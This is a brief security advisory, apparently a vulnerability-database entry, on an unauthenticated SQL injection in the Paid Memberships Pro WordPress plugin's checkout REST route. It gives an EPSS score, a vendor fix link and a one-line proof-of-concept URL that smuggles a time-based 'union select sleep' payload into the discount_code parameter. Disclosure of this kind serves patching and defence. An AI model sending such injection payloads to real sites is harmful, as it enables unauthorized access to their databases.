0.03 Low
EPSS
Percentile
91.0%
The plugin does not escape the discount_code in one of its REST route (available to unauthenticated users) before using it in a SQL statement, leading to a SQL injection
https://example.com/?rest_route=/pmpro/v1/checkout_level&level;_id=3&discount;_code=' union select sleep(1) -- g
www.paidmembershipspro.com/pmpro-update-2-6-7-security-release/